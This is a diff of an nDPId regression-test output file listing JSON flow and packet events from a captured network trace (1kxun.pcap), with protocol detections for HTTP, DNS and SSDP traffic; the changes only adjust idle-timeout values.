{"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1470104380603,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104380603,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLUAAAQRv8HAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1470104380737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"} 
@@ -174,18 +174,18 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1470104380737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1470104380772,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1470104380772,"pkt":"ABxCjnAxTF4M6gNlCABFAABmlL4AAC4RtAgICAgIwKhzCAA11JQAUqbTpTiBgAABAAIAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQABwAwABQABAAABKwANCnByb3h5LXNldDHAD8AtAAEAAQAAASsABMvNl+o="} 00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380909,"flow_last_seen":1470104380909,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104380909,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1470104380909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104380909,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1470104381115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381115,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEIAAAER2QjAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381217,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U68AAAERvz7AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} 
@@ -193,16 +193,16 @@ 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381217,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFE8AAAER7zXAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"} 
